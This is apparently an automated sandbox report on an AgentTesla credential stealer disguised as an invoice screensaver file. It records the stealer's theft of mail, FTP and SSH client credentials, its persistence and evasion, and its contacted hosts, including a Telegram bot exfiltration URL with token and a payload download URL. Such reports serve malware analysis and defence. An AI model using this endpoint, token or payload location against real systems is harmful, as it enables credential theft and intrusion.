                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts121
                      Windows Management Instrumentation                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		211
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		11
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		2
                      Software Packing                      		NTDS311
                      Security Software Discovery                      		Distributed Component Object Model11
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSH1
                      Clipboard Data                      		14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545982 Sample: Proforma Invoice.scr.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 geocs.mx 2->32 34 api.ipify.org 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 15 other signatures 2->50 8 wscript.exe 1 2->8         started        11 Proforma Invoice.scr.exe 15 5 2->11         started        signatures3 48 Uses the Telegram API (likely for C&C communication) 30->48 process4 dnsIp5 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->60 15 EncoderFallback.exe 14 2 8->15         started        40 geocs.mx 173.237.185.182, 443, 49737, 49910 INTELLECTICA-US United States 11->40 24 C:\Users\user\AppData\...ncoderFallback.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\...ncoderFallback.vbs, ASCII 11->26 dropped 28 C:\...ncoderFallback.exe:Zone.Identifier, ASCII 11->28 dropped 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->62 18 InstallUtil.exe 14 2 11->18         started        file6 signatures7 process8 dnsIp9 64 Antivirus detection for dropped file 15->64 66 Multi AV Scanner detection for dropped file 15->66 68 Machine Learning detection for dropped file 15->68 76 2 other signatures 15->76 21 InstallUtil.exe 2 15->21         started        36 api.telegram.org 149.154.167.220, 443, 49879, 49890 TELEGRAMRU United Kingdom 18->36 38 api.ipify.org 104.26.13.205, 443, 49841, 51774 CLOUDFLARENETUS United States 18->38 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->70 72 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->72 74 Tries to steal Mail credentials (via file / registry access) 18->74 signatures10 process11 signatures12 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->52 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal ftp login credentials 21->56 58 2 other signatures 21->58

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Proforma Invoice.scr.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      Proforma Invoice.scr.exe100%AviraHEUR/AGEN.1308518
                      Proforma Invoice.scr.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\EncoderFallback.exe100%AviraHEUR/AGEN.1308518
                      C:\Users\user\AppData\Roaming\EncoderFallback.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\EncoderFallback.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ipify.org/0%URL Reputationsafe
                      https://api.ipify.org0%URL Reputationsafe
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      https://api.ipify.org/t0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s-part-0017.t-0009.fb-t-msedge.net
                      		13.107.253.45
                      		truefalse
                        		unknown
                        geocs.mx
                        		173.237.185.182
                        		truefalse
                          		unknown
                          api.ipify.org
                          		104.26.13.205
                          		truefalse
                            		unknown
                            api.telegram.org
                            		149.154.167.220
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                              • URL Reputation: safe
                              		unknown
                              https://geocs.mx/wp-includes/Hjewct.vdffalse
                                		unknown
                                https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocumenttrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://api.ipify.orgProforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netiProforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://stackoverflow.com/q/14436606/23354Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://account.dyn.com/Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.orgInstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://github.com/mgravell/protobuf-netJProforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://stackoverflow.com/q/11564914/23354;Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://stackoverflow.com/q/2152978/23354Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://geocs.mxProforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/mgravell/protobuf-netProforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.ipify.org/tInstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://api.telegram.orgInstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                173.237.185.182
                                                		geocs.mxUnited States
                                                		394094INTELLECTICA-USfalse
                                                149.154.167.220
                                                		api.telegram.orgUnited Kingdom
                                                		62041TELEGRAMRUtrue
                                                104.26.13.205
                                                		api.ipify.orgUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1545982
                                                Start date and time:2024-10-31 11:13:00 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Proforma Invoice.scr.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@4/3
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 275
                                                • Number of non-executed functions: 10
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, azurefd-t-fb-prod.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Proforma Invoice.scr.exe, PID 4000 because it is empty
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Proforma Invoice.scr.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                06:14:04API Interceptor51x Sleep call for process: Proforma Invoice.scr.exe modified
                                                06:14:32API Interceptor11491x Sleep call for process: InstallUtil.exe modified
                                                06:14:37API Interceptor38x Sleep call for process: EncoderFallback.exe modified
                                                11:14:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                173.237.185.182INQ-40152.scrGet hashmaliciousUnknownBrowse
                                                  RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    PO No. 24156.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      PO 0087900.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          RFQ-00032035.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                invoice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  New-Order534211.scr.exeGet hashmaliciousUnknownBrowse
                                                                    149.154.167.220MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          Invoices.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            FERRO FAB INV.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exeGet hashmaliciousDarkCloudBrowse
                                                                                PRESUPUESTO DE NOVIEMBRE...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                        104.26.13.205file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                        • api.ipify.org/
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        geocs.mxINQ-40152.scrGet hashmaliciousUnknownBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO No. 24156.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO 0087900.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-00032035.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
